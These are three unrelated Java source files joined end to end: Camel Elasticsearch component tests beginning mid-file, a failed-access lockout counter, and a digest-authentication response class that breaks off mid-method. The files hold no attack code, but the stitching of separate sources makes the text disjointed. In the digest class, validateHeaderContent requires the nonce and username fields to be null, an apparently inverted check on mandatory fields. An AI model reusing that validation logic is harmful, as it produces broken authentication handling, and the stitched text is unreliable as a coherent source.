org.elasticsearch.action.get.MultiGetRequest.Item; import org.elasticsearch.action.get.MultiGetResponse; import org.elasticsearch.action.index.IndexRequest; import org.elasticsearch.action.search.MultiSearchResponse; import org.elasticsearch.action.search.SearchRequest; import org.elasticsearch.action.search.SearchRequestBuilder; import org.elasticsearch.action.search.SearchResponse; import org.elasticsearch.index.query.QueryBuilders; import org.junit.Test; import static org.hamcrest.CoreMatchers.equalTo; import static org.hamcrest.CoreMatchers.notNullValue; public class ElasticsearchGetSearchDeleteExistsUpdateTest extends ElasticsearchBaseTest { @Test public void testGet() throws Exception { //first, INDEX a value Map<String, String> map = 
// NOTE(review): this region begins mid-method — the enclosing test class declaration and
// the opening of this first test are outside the visible chunk. The fragment below is the
// tail of a test that indexes a document and verifies it can be fetched by id.
createIndexedData(); sendBody("direct:index", map);
String indexId = template.requestBody("direct:index", map, String.class);
assertNotNull("indexId should be set", indexId);
//now, verify GET succeeded
GetResponse response = template.requestBody("direct:get", indexId, GetResponse.class);
assertNotNull("response should not be null", response);
assertNotNull("response source should not be null", response.getSource());
}

/**
 * Indexes a document, verifies it is retrievable, deletes it, then verifies the
 * subsequent GET returns a response whose source is null.
 */
@Test
public void testDelete() throws Exception {
    //first, INDEX a value
    Map<String, String> map = createIndexedData();
    sendBody("direct:index", map);
    String indexId = template.requestBody("direct:index", map, String.class);
    assertNotNull("indexId should be set", indexId);
    //now, verify GET succeeded
    GetResponse response = template.requestBody("direct:get", indexId, GetResponse.class);
    assertNotNull("response should not be null", response);
    assertNotNull("response source should not be null", response.getSource());
    //now, perform DELETE
    DeleteResponse deleteResponse = template.requestBody("direct:delete", indexId, DeleteResponse.class);
    assertNotNull("response should not be null", deleteResponse);
    //now, verify GET fails to find the indexed value
    response = template.requestBody("direct:get", indexId, GetResponse.class);
    assertNotNull("response should not be null", response);
    assertNull("response source should be null", response.getSource());
}

/**
 * Indexes a document and runs a "match" query against the "content" field via the
 * direct:search route.
 */
@Test
public void testSearch() throws Exception {
    //first, INDEX a value
    Map<String, String> map = createIndexedData();
    sendBody("direct:index", map);
    //now, verify GET succeeded
    Map<String, Object> actualQuery = new HashMap<String, Object>();
    actualQuery.put("content", "searchtest");
    Map<String, Object> match = new HashMap<String, Object>();
    match.put("match", actualQuery);
    Map<String, Object> query = new HashMap<String, Object>();
    query.put("query", match);
    SearchResponse response = template.requestBody("direct:search", query, SearchResponse.class);
    assertNotNull("response should not be null", response);
    // NOTE(review): the message says "== 1" but assertNotNull only checks non-null;
    // an assertEquals on the hit count may have been intended — confirm.
    assertNotNull("response hits should be == 1", response.getHits().totalHits());
}

/**
 * Indexes a document, then updates it through the direct:update route using the
 * index id passed in the {@code PARAM_INDEX_ID} header.
 */
@Test
public void testUpdate() throws Exception {
    Map<String, String> map = createIndexedData();
    String indexId = template.requestBody("direct:index", map, String.class);
    assertNotNull("indexId should be set", indexId);
    Map<String, String> newMap = new HashMap<>();
    newMap.put(createPrefix() + "key2", createPrefix() + "value2");
    Map<String, Object> headers = new HashMap<>();
    headers.put(ElasticsearchConstants.PARAM_INDEX_ID, indexId);
    indexId = template.requestBodyAndHeaders("direct:update", newMap, headers, String.class);
    assertNotNull("indexId should be set", indexId);
}

/**
 * Exercises the generic direct:start route, selecting the INDEX and then GET_BY_ID
 * operations purely via message headers.
 */
@Test
public void testGetWithHeaders() throws Exception {
    //first, INDEX a value
    Map<String, String> map = createIndexedData();
    Map<String, Object> headers = new HashMap<String, Object>();
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_INDEX);
    headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "twitter");
    headers.put(ElasticsearchConstants.PARAM_INDEX_TYPE, "tweet");
    String indexId = template.requestBodyAndHeaders("direct:start", map, headers, String.class);
    //now, verify GET
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_GET_BY_ID);
    GetResponse response = template.requestBodyAndHeaders("direct:start", indexId, headers, GetResponse.class);
    assertNotNull("response should not be null", response);
    assertNotNull("response source should not be null", response.getSource());
}

/**
 * Indexes into "twitter" via headers, then checks index existence through the
 * direct:exists route.
 */
@Test
public void testExistsWithHeaders() throws Exception {
    //first, INDEX a value
    Map<String, String> map = createIndexedData();
    Map<String, Object> headers = new HashMap<String, Object>();
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_INDEX);
    headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "twitter");
    headers.put(ElasticsearchConstants.PARAM_INDEX_TYPE, "tweet");
    // NOTE(review): indexId is captured but never used in this test.
    String indexId = template.requestBodyAndHeaders("direct:start", map, headers, String.class);
    //now, verify GET
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_EXISTS);
    headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "twitter");
    Boolean exists = template.requestBodyAndHeaders("direct:exists", "", headers, Boolean.class);
    assertNotNull("response should not be null", exists);
    assertTrue("Index should exists", exists);
}

/**
 * Indexes two documents into different indices, then performs a MULTIGET for those
 * two plus a deliberately missing third item and checks per-item success/failure.
 */
@Test
public void testMultiGet() throws Exception {
    //first, INDEX two values
    Map<String, String> map = createIndexedData();
    Map<String, Object> headers = new HashMap<String, Object>();
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_INDEX);
    headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "twitter");
    headers.put(ElasticsearchConstants.PARAM_INDEX_TYPE, "tweet");
    headers.put(ElasticsearchConstants.PARAM_INDEX_ID, "1");
    template.requestBodyAndHeaders("direct:start", map, headers, String.class);
    headers.clear();
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_INDEX);
    headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "facebook");
    headers.put(ElasticsearchConstants.PARAM_INDEX_TYPE, "status");
    headers.put(ElasticsearchConstants.PARAM_INDEX_ID, "2");
    template.requestBodyAndHeaders("direct:start", map, headers, String.class);
    headers.clear();
    //now, verify MULTIGET
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_MULTIGET);
    Item item1 = new Item("twitter", "tweet", "1");
    Item item2 = new Item("facebook", "status", "2");
    // item3 targets an index that was never created, so its response must be failed
    Item item3 = new Item("instagram", "latest", "3");
    List<Item> list = new ArrayList<Item>();
    list.add(item1);
    list.add(item2);
    list.add(item3);
    MultiGetResponse response = template.requestBodyAndHeaders("direct:start", list, headers, MultiGetResponse.class);
    MultiGetItemResponse[] responses = response.getResponses();
    assertNotNull("response should not be null", response);
    assertEquals("response should contains three multiGetResponse object", 3, response.getResponses().length);
    assertEquals("response 1 should contains tweet as type", "tweet", responses[0].getResponse().getType().toString());
    assertEquals("response 2 should contains status as type", "status", responses[1].getResponse().getType().toString());
    assertFalse("response 1 should be ok", responses[0].isFailed());
    assertFalse("response 2 should be ok", responses[1].isFailed());
    assertTrue("response 3 should be failed", responses[2].isFailed());
}

/**
 * Seeds two documents directly through the embedded node client, then performs a
 * MULTISEARCH with two matching queries and one against a missing index.
 */
@Test
public void testMultiSearch() throws Exception {
    //first, INDEX two values
    Map<String, Object> headers = new HashMap<String, Object>();
    node.client().prepareIndex("test", "type", "1").setSource("field", "xxx").execute().actionGet();
    node.client().prepareIndex("test", "type", "2").setSource("field", "yyy").execute().actionGet();
    //now, verify MULTISEARCH
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_MULTISEARCH);
    SearchRequestBuilder srb1 = node.client().prepareSearch("test").setTypes("type").setQuery(QueryBuilders.termQuery("field", "xxx"));
    SearchRequestBuilder srb2 = node.client().prepareSearch("test").setTypes("type").setQuery(QueryBuilders.termQuery("field", "yyy"));
    SearchRequestBuilder srb3 = node.client().prepareSearch("instagram")
            .setTypes("type").setQuery(QueryBuilders.termQuery("test-multisearchkey", "test-multisearchvalue"));
    List<SearchRequest> list = new ArrayList<>();
    list.add(srb1.request());
    list.add(srb2.request());
    list.add(srb3.request());
    MultiSearchResponse response = template.requestBodyAndHeaders("direct:multisearch", list, headers, MultiSearchResponse.class);
    MultiSearchResponse.Item[] responses = response.getResponses();
    assertNotNull("response should not be null", response);
    assertEquals("response should contains three multiSearchResponse object", 3, response.getResponses().length);
    assertFalse("response 1 should be ok", responses[0].isFailure());
    assertFalse("response 2 should be ok", responses[1].isFailure());
    assertTrue("response 3 should be failed", responses[2].isFailure());
}

/**
 * Full INDEX / GET / DELETE / GET cycle through the single direct:start route,
 * switching operations via the {@code PARAM_OPERATION} header.
 */
@Test
public void testDeleteWithHeaders() throws Exception {
    //first, INDEX a value
    Map<String, String> map = createIndexedData();
    Map<String, Object> headers = new HashMap<String, Object>();
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_INDEX);
    headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "twitter");
    headers.put(ElasticsearchConstants.PARAM_INDEX_TYPE, "tweet");
    String indexId = template.requestBodyAndHeaders("direct:start", map, headers, String.class);
    //now, verify GET
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_GET_BY_ID);
    GetResponse response = template.requestBodyAndHeaders("direct:start", indexId, headers, GetResponse.class);
    assertNotNull("response should not be null", response);
    assertNotNull("response source should not be null", response.getSource());
    //now, perform DELETE
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_DELETE);
    DeleteResponse deleteResponse = template.requestBodyAndHeaders("direct:start", indexId, headers, DeleteResponse.class);
    assertNotNull("response should not be null", deleteResponse);
    //now, verify GET fails to find the indexed value
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_GET_BY_ID);
    response = template.requestBodyAndHeaders("direct:start", indexId, headers, GetResponse.class);
    assertNotNull("response should not be null", response);
    assertNull("response source should be null", response.getSource());
}

/**
 * Verifies that an explicitly supplied {@code PARAM_INDEX_ID} ("123") is honored on
 * both INDEX and UPDATE operations.
 */
@Test
public void testUpdateWithIDInHeader() throws Exception {
    Map<String, String> map = createIndexedData();
    Map<String, Object> headers = new HashMap<String, Object>();
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_INDEX);
    headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "twitter");
    headers.put(ElasticsearchConstants.PARAM_INDEX_TYPE, "tweet");
    headers.put(ElasticsearchConstants.PARAM_INDEX_ID, "123");
    String indexId = template.requestBodyAndHeaders("direct:start", map, headers, String.class);
    assertNotNull("indexId should be set", indexId);
    assertEquals("indexId should be equals to the provided id", "123", indexId);
    headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_UPDATE);
    indexId = template.requestBodyAndHeaders("direct:start", map, headers, String.class);
    assertNotNull("indexId should be set", indexId);
    assertEquals("indexId should be equals to the provided id", "123", indexId);
}

/**
 * Sends a raw {@link GetRequest} as the message body and verifies the fetched
 * document's source matches what was indexed.
 */
@Test
public void getRequestBody() throws Exception {
    String prefix = createPrefix();
    // given
    GetRequest request = new GetRequest(prefix + "foo").type(prefix + "bar");
    // when
    String documentId = template.requestBody("direct:index",
            new IndexRequest(prefix + "foo", prefix + "bar", prefix + "testId")
                    .source("{\"" + prefix + "content\": \"" + prefix + "hello\"}"), String.class);
    GetResponse response = template.requestBody("direct:get", request.id(documentId), GetResponse.class);
    // then
    assertThat(response, notNullValue());
    assertThat(prefix + "hello", equalTo(response.getSourceAsMap().get(prefix + "content")));
}

/**
 * Sends a raw {@link DeleteRequest} as the message body and verifies the deleted
 * document id matches the one that was indexed.
 */
@Test
public void deleteRequestBody() throws Exception {
    String prefix = createPrefix();
    // given
    DeleteRequest request = new DeleteRequest(prefix + "foo").type(prefix + "bar");
    // when
    String documentId = template.requestBody("direct:index",
            new IndexRequest("" + prefix + "foo", "" + prefix + "bar", "" + prefix + "testId")
                    .source("{\"" + prefix + "content\": \"" + prefix + "hello\"}"), String.class);
    DeleteResponse response = template.requestBody("direct:delete", request.id(documentId), DeleteResponse.class);
    // then
    assertThat(response, notNullValue());
    assertThat(documentId, equalTo(response.getId()));
}

/**
 * Wires one direct:* endpoint per Elasticsearch operation used by the tests above.
 */
@Override
protected RouteBuilder createRouteBuilder() throws Exception {
    return new RouteBuilder() {
        @Override
        public void configure() {
            from("direct:start").to("elasticsearch://local?operation=INDEX");
            from("direct:index").to("elasticsearch://local?operation=INDEX&indexName=twitter&indexType=tweet");
            from("direct:get").to("elasticsearch://local?operation=GET_BY_ID&indexName=twitter&indexType=tweet");
            from("direct:multiget").to("elasticsearch://local?operation=MULTIGET&indexName=twitter&indexType=tweet");
            from("direct:delete").to("elasticsearch://local?operation=DELETE&indexName=twitter&indexType=tweet");
            from("direct:search").to("elasticsearch://local?operation=SEARCH&indexName=twitter&indexType=tweet");
            from("direct:update").to("elasticsearch://local?operation=UPDATE&indexName=twitter&indexType=tweet");
            from("direct:exists").to("elasticsearch://local?operation=EXISTS");
            from("direct:multisearch").to("elasticsearch://local?operation=MULTISEARCH&indexName=test");
        }
    };
}
}
/* * Copyright 2015 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.bremersee.fac; import org.apache.commons.lang3.Validate; import org.bremersee.comparator.ObjectComparatorFactory; import org.bremersee.fac.domain.FailedAccessDao; import org.bremersee.fac.domain.mem.FailedAccessInMemoryDao; import org.bremersee.fac.model.AccessResultDto; import org.bremersee.fac.model.BooleanDto; import org.bremersee.fac.model.FailedAccess; import org.bremersee.fac.model.FailedAccessDto; import org.bremersee.pagebuilder.PageBuilder; import org.bremersee.pagebuilder.PageBuilderImpl; import org.bremersee.pagebuilder.PageBuilderUtils; import org.bremersee.pagebuilder.PageEntryTransformer; import org.bremersee.pagebuilder.model.Page; import org.bremersee.pagebuilder.model.PageDto; import org.bremersee.pagebuilder.model.PageRequest; import org.bremersee.pagebuilder.model.PageRequestDto; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import javax.annotation.PostConstruct; import javax.annotation.PreDestroy; import java.io.Serializable; import java.time.Duration; import java.util.Date; import java.util.Iterator; import java.util.List; /** * <p> * Default failed access counter implementation. It can use any store that * implements {@link FailedAccessDao}. It uses an internal thread for removing * obsolete failed access entries. 
 * So it is important that the failed access
 * counter is started and stopped properly (see
 * {@link FailedAccessCounterImpl#start()} and
 * {@link FailedAccessCounterImpl#stop()}).
 * </p>
 *
 * @author Christian Bremer
 */
@SuppressWarnings("SameParameterValue")
public class FailedAccessCounterImpl implements FailedAccessCounter {

    /**
     * The logger
     */
    private final Logger log = LoggerFactory.getLogger(getClass());

    // Guards the start/stop lifecycle transitions.
    private final Object lock = new Object();

    private boolean started;

    /**
     * The failed access DAO
     */
    private FailedAccessDao failedAccessDao;

    /**
     * The page builder
     */
    private PageBuilder pageBuilder;

    // Accesses above this counter value are considered blocked (see isAccessGranted).
    private int failedAccessCounterThreshold;

    private long removeFailedAccessEntriesAfterMillis;

    private long removeFailedEntriesInterval;

    // Statistics of the background cleanup, read by the public getters below.
    private volatile long lastRemovingOfFailedEntries;
    private volatile long lastRemovingOfFailedEntriesDuration;
    private volatile int lastRemovingOfFailedEntriesSize;
    private volatile long removedFailedEntriesTotalSize;
    // NOTE(review): field name has a typo ("Runnning"); kept because it is referenced
    // throughout this class. Also see the non-atomic check-then-act note in
    // removeObsoleteFailedAccessEntries().
    private volatile boolean removingRunnning;

    /**
     * The thread for removing obsolete failed access entries.
     */
    private final Thread removeFailedEntriesThread = new Thread() {
        @Override
        public void run() {
            while (!isInterrupted()) {
                FailedAccessCounterImpl.this.removeObsoleteFailedAccessEntries();
                try {
                    Thread.sleep(FailedAccessCounterImpl.this.getRemoveFailedEntriesInterval());
                } catch (InterruptedException e) {
                    // restore interrupt status and terminate the cleanup loop
                    this.interrupt();
                    return;
                }
            }
        }
    };

    /**
     * Default constructor.
     */
    public FailedAccessCounterImpl() {
        pageBuilder = new PageBuilderImpl();
        failedAccessCounterThreshold = 10;
        removeFailedAccessEntriesAfterMillis = Duration.ofHours(23L).toMillis();
        removeFailedEntriesInterval = Duration.ofHours(1L).toMillis();
        lastRemovingOfFailedEntries = System.currentTimeMillis();
        lastRemovingOfFailedEntriesDuration = 0L;
        lastRemovingOfFailedEntriesSize = 0;
        removedFailedEntriesTotalSize = 0L;
        removingRunnning = false;
    }

    /**
     * Starts the failed access counter. Creates an in-memory DAO when none was
     * injected and launches the background cleanup thread. Idempotent: a second
     * call only logs a warning.
     */
    @PostConstruct
    public void start() {
        synchronized (lock) {
            if (!started) {
                log.info("Starting " + getClass().getSimpleName() + " ...");
                if (failedAccessDao == null) {
                    FailedAccessInMemoryDao failedAccessDao = new FailedAccessInMemoryDao(); // NOSONAR
                    failedAccessDao.setObjectComparatorFactory(ObjectComparatorFactory.newInstance());
                    failedAccessDao.init();
                    this.failedAccessDao = failedAccessDao;
                }
                log.info("failedAccessDao = " + failedAccessDao.getClass().getSimpleName()); // NOSONAR
                log.info("failedAccessCounterThreshold = " + getFailedAccessCounterThreshold());
                log.info("removeFailedAccessEntriesAfterMillis = " + getRemoveFailedAccessEntriesAfterMillis());
                log.info("removeFailedEntriesInterval = " + getRemoveFailedEntriesInterval());
                lastRemovingOfFailedEntries = System.currentTimeMillis();
                removeFailedEntriesThread.start();
                log.info(getClass().getSimpleName() + " successfully started.");
                started = true;
            } else {
                log.warn("Failed access counter is already started.");
            }
        }
    }

    /**
     * Stops the failed access counter by interrupting the cleanup thread.
     */
    @PreDestroy
    public void stop() {
        synchronized (lock) {
            if (started) {
                log.info("Stopping " + getClass().getSimpleName() + " ...");
                removeFailedEntriesThread.interrupt();
                log.info(getClass().getSimpleName() + " successfully stopped.");
                started = false;
            } else {
                log.warn("Failed access counter has not been started.");
            }
        }
    }

    /**
     * Sets the failed access DAO.
     *
     * @param failedAccessDao the failed access DAO
     */
    public void setFailedAccessDao(final FailedAccessDao failedAccessDao) {
        this.failedAccessDao = failedAccessDao;
    }

    /**
     * Sets the page builder (ignored when {@code null}).
     *
     * @param pageBuilder the page builder
     */
    public void setPageBuilder(final PageBuilder pageBuilder) {
        if (pageBuilder != null) {
            this.pageBuilder = pageBuilder;
        }
    }

    @Override
    public int getFailedAccessCounterThreshold() {
        return failedAccessCounterThreshold;
    }

    /**
     * Sets the counter threshold.
     *
     * @param failedAccessCounterThreshold the counter threshold
     */
    public void setFailedAccessCounterThreshold(final int failedAccessCounterThreshold) {
        this.failedAccessCounterThreshold = failedAccessCounterThreshold;
    }

    @Override
    public long getRemoveFailedAccessEntriesAfterMillis() {
        return removeFailedAccessEntriesAfterMillis;
    }

    /**
     * Sets the lifetime of a failed access entry.
     *
     * @param removeFailedAccessEntriesAfterMillis the lifetime of a failed access entry
     */
    public void setRemoveFailedAccessEntriesAfterMillis(final long removeFailedAccessEntriesAfterMillis) {
        this.removeFailedAccessEntriesAfterMillis = removeFailedAccessEntriesAfterMillis;
    }

    @Override
    public long getRemoveFailedEntriesInterval() {
        return removeFailedEntriesInterval;
    }

    /**
     * Sets the interval of removing obsolete failed access entries.
     *
     * @param removeFailedEntriesInterval the interval of removing obsolete failed access entries
     */
    public void setRemoveFailedEntriesInterval(final long removeFailedEntriesInterval) {
        this.removeFailedEntriesInterval = removeFailedEntriesInterval;
    }

    /**
     * Returns {@code true} if the access to the resource is not blocked for the
     * remote host, otherwise {@code false}. A missing entry or a counter at or
     * below the threshold means access is granted.
     *
     * @param failedAccess the failed access entry
     * @return {@code true} if the access to the resource is not blocked for the
     *         remote host, otherwise {@code false}
     */
    private boolean isAccessGranted(FailedAccess failedAccess) {
        return failedAccess == null || failedAccess.getCounter() <= this.failedAccessCounterThreshold;
    }

    /**
     * Calculates how long the resource is blocked for the remote host. The raw
     * expiry (modification time + entry lifetime) is rounded up to the next run
     * of the cleanup thread, because the entry is only removed then.
     *
     * @param failedAccess the failed access entry
     * @return the date until the resource is blocked for the remote host or
     *         {@code null}, if the resource is not blocked
     */
    private Date calculateAccessDeniedUntil(final FailedAccess failedAccess) {
        if (isAccessGranted(failedAccess) || failedAccess.getModificationDate() == null) {
            return null;
        }
        long accessDeniedUntilMillis = failedAccess.getModificationDate().getTime()
                + removeFailedAccessEntriesAfterMillis;
        long nextRemove = lastRemovingOfFailedEntries + removeFailedEntriesInterval;
        while (nextRemove < accessDeniedUntilMillis) {
            nextRemove = nextRemove + removeFailedEntriesInterval;
        }
        long plus = nextRemove - accessDeniedUntilMillis;
        accessDeniedUntilMillis = accessDeniedUntilMillis + plus;
        return new Date(accessDeniedUntilMillis);
    }

    @Override
    public Date getLastRemovingOfFailedEntries() {
        return new Date(lastRemovingOfFailedEntries);
    }

    @Override
    public long getLastRemovingOfFailedEntriesDuration() {
        return lastRemovingOfFailedEntriesDuration;
    }

    @Override
    public int getLastRemovingOfFailedEntriesSize() {
        return lastRemovingOfFailedEntriesSize;
    }

    @Override
    public long getRemovedFailedEntriesTotalSize() {
        return removedFailedEntriesTotalSize;
    }

    /**
     * Returns a page of failed access entries matching the page request; a
     * {@code null} request is treated as an empty default request.
     */
    @Override
    public PageDto getFailedAccessEntries(final PageRequestDto request) {
        final PageRequest pageRequest = request == null ? new PageRequestDto() : request;
        //@formatter:off
        final Long totalSize = failedAccessDao.count(pageRequest.getQuery());
        final List<? extends FailedAccess> entities = failedAccessDao
                .find(pageRequest.getQuery(), pageRequest.getFirstResult(), pageRequest.getPageSize(),
                        pageRequest.getComparatorItem());
        //@formatter:on
        final Page<? extends FailedAccess> page = pageBuilder.buildPage(entities, pageRequest, totalSize);
        return PageBuilderUtils.createPageDto(
                page, (PageEntryTransformer<FailedAccessDto, FailedAccess>) FailedAccessDto::new);
    }

    // Null-safe entity-to-DTO mapping.
    private FailedAccessDto createFailedAccessDto(final FailedAccess source) {
        return source == null ? null : new FailedAccessDto(source);
    }

    @Override
    public FailedAccessDto getFailedAccessEntry(final Serializable id) {
        Validate.notNull(id, "ID must not be null.");
        final FailedAccess entity = failedAccessDao.getById(id);
        final FailedAccessDto dto = createFailedAccessDto(entity);
        if (log.isDebugEnabled()) {
            log.debug("Returning failed access DTO with ID [" + id + "]: " + dto);
        }
        return dto;
    }

    @Override
    public FailedAccessDto getFailedAccessEntry(final String resourceId, final String remoteHost) {
        FailedAccess entity = failedAccessDao.getByResourceIdAndRemoteHost(resourceId, remoteHost);
        final FailedAccessDto dto = createFailedAccessDto(entity);
        if (log.isDebugEnabled()) {
            log.debug("Returning failed access DTO with resource ID [" + resourceId + "] and remote host ["
                    + remoteHost + "]: " + dto);
        }
        return dto;
    }

    @Override
    public BooleanDto removeFailedAccessEntry(String resourceId, String remoteHost) {
        boolean value = failedAccessDao.removeByResourceIdAndRemoteHost(resourceId, remoteHost);
        if (value) {
            removedFailedEntriesTotalSize = removedFailedEntriesTotalSize + 1L;
        }
        return new BooleanDto(value);
    }

    /**
     * Removes all failed access entries that are older than the configured
     * lifetime and updates the cleanup statistics.
     * NOTE(review): the {@code removingRunnning} guard is a non-atomic
     * check-then-act on a volatile; two callers could pass it concurrently.
     * Appears acceptable here since it is primarily driven by the single
     * cleanup thread — confirm before relying on exclusivity.
     */
    @Override
    public void removeObsoleteFailedAccessEntries() {
        if (removingRunnning) {
            return;
        }
        try {
            removingRunnning = true;
            lastRemovingOfFailedEntries = System.currentTimeMillis();
            int size = 0;
            List<? extends FailedAccess> entities = failedAccessDao.findObsolete(removeFailedAccessEntriesAfterMillis);
            Iterator<? extends FailedAccess> entityIterator = entities.iterator();
            while (entityIterator.hasNext()) { // NOSONAR
                FailedAccess entity = entityIterator.next();
                entityIterator.remove();
                removeFailedAccessEntry(entity.getResourceId(), entity.getRemoteHost());
                size = size + 1;
            }
            lastRemovingOfFailedEntriesSize = size;
            lastRemovingOfFailedEntriesDuration = System.currentTimeMillis() - lastRemovingOfFailedEntries;
        } finally {
            removingRunnning = false;
        }
    }

    /**
     * Records a successful access: when access is (still) granted the failed
     * access entry is removed; otherwise the current counter is reported.
     */
    @Override
    public AccessResultDto accessSucceeded(String resourceId, String remoteHost, Long timeInMillis) {
        Date modificationDate = timeInMillis == null || timeInMillis <= 0 ? new Date() : new Date(timeInMillis);
        FailedAccess entity = failedAccessDao.getByResourceIdAndRemoteHost(resourceId, remoteHost);
        boolean accessGranted = isAccessGranted(entity);
        AccessResultDto result = new AccessResultDto(accessGranted, modificationDate.getTime(),
                calculateAccessDeniedUntil(entity));
        if (accessGranted) {
            result.setCounter(0);
            if (entity != null) {
                failedAccessDao.removeById(entity.getId());
            }
        } else {
            result.setCounter(entity.getCounter());
        }
        result.setCounterThreshold(getFailedAccessCounterThreshold());
        return result;
    }

    /**
     * Records a failed access: creates a new entry with counter 1 or increments
     * the existing counter, persists it, and reports the (possibly now blocked)
     * access state.
     */
    @Override
    public AccessResultDto accessFailed(String resourceId, String remoteHost, Long timeInMillis) {
        Date modificationDate = timeInMillis == null || timeInMillis <= 0 ? new Date() : new Date(timeInMillis);
        FailedAccess entity = failedAccessDao.getByResourceIdAndRemoteHost(resourceId, remoteHost);
        FailedAccessDto dto;
        if (entity == null) {
            dto = new FailedAccessDto();
            dto.setCounter(1);
            dto.setCreationDate(modificationDate);
            dto.setModificationDate(modificationDate);
            dto.setRemoteHost(remoteHost);
            dto.setResourceId(resourceId);
        } else {
            dto = new FailedAccessDto(entity);
            dto.setModificationDate(modificationDate);
            dto.setCounter(dto.getCounter() + 1);
        }
        entity = failedAccessDao.save(dto);
        boolean accessGranted = isAccessGranted(entity);
        AccessResultDto result = new AccessResultDto(accessGranted, modificationDate.getTime(),
                calculateAccessDeniedUntil(dto));
        result.setCounter(entity.getCounter()); // NOSONAR
        result.setCounterThreshold(getFailedAccessCounterThreshold());
        return result;
    }

    /**
     * Reports (without modifying) whether access is currently granted for the
     * given resource/host pair.
     */
    @Override
    public AccessResultDto isAccessGranted(String resourceId, String remoteHost) {
        FailedAccess entity = failedAccessDao.getByResourceIdAndRemoteHost(resourceId, remoteHost);
        long timestamp = entity != null ? entity.getModificationDate().getTime() : System.currentTimeMillis();
        boolean accessGranted = isAccessGranted(entity);
        AccessResultDto dto = new AccessResultDto(accessGranted, timestamp, calculateAccessDeniedUntil(entity));
        if (log.isDebugEnabled()) {
            log.debug("Is access granted [resource ID = " + resourceId + ", remote host = " + remoteHost + "]? " + dto);
        }
        return dto;
    }
}
/* * Copyright 2010 Bruno de Carvalho * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /* * Copyright (c) 2009 WIT Software. All rights reserved. * * WIT Software Confidential and Proprietary information. It is strictly forbidden for 3rd parties to modify, decompile, * disassemble, defeat, disable or circumvent any protection mechanism; to sell, license, lease, rent, redistribute or * make accessible to any third party, whether for profit or without charge. * * carvalho 2009/06/03 */ package com.biasedbit.hotpotato.util.digest; import java.text.ParseException; import java.util.Collections; import java.util.HashMap; import java.util.Map; /** * Digest authentication challenge response. 
* * @author <a href="http://bruno.biasedbit.com/">Bruno de Carvalho</a> */ public class DigestAuthChallengeResponse { // internal vars -------------------------------------------------------------------------------------------------- private final Map<String, String> properties; // constructors --------------------------------------------------------------------------------------------------- public DigestAuthChallengeResponse(Map<String, String> properties) { this.properties = properties; } public DigestAuthChallengeResponse() { this.properties = new HashMap<String, String>(); } // public static methods ------------------------------------------------------------------------------------------ public static DigestAuthChallengeResponse createFromHeader(String header) throws ParseException { return new DigestAuthChallengeResponse(DigestUtils.parseHeader(header)); } public static boolean validateHeaderContent(DigestAuthChallengeResponse response) { return ((response.properties.get(DigestUtils.SCHEME) != null) && (response.properties.get(DigestUtils.RESPONSE) != null) && (response.properties.get(DigestUtils.NONCE) == null) && (response.properties.get(DigestUtils.USERNAME) == null) && (response.properties.get(DigestUtils.URI) != null)); } // public methods ------------------------------------------------------------------------------------------------- public String buildAsString() { StringBuilder builder = new StringBuilder(); builder.append(this.getScheme()) .append(" username=\"").append((this.getUsername())) .append("\", nonce=\"").append(this.getNonce()) .append("\", uri=\"").append(this.getUri()) .append("\", response=\"").append(this.getResponse()).append('\"'); String tmp = this.getRealm(); if (tmp != null) { builder.append(", realm=\"").append(tmp).append('\"'); } tmp = this.getAlgorithm(); if (tmp != null) { builder.append(", algorithm=").append(tmp); } tmp = this.getQop(); if (tmp != null) { builder.append(", qop=").append(tmp) .append(", 
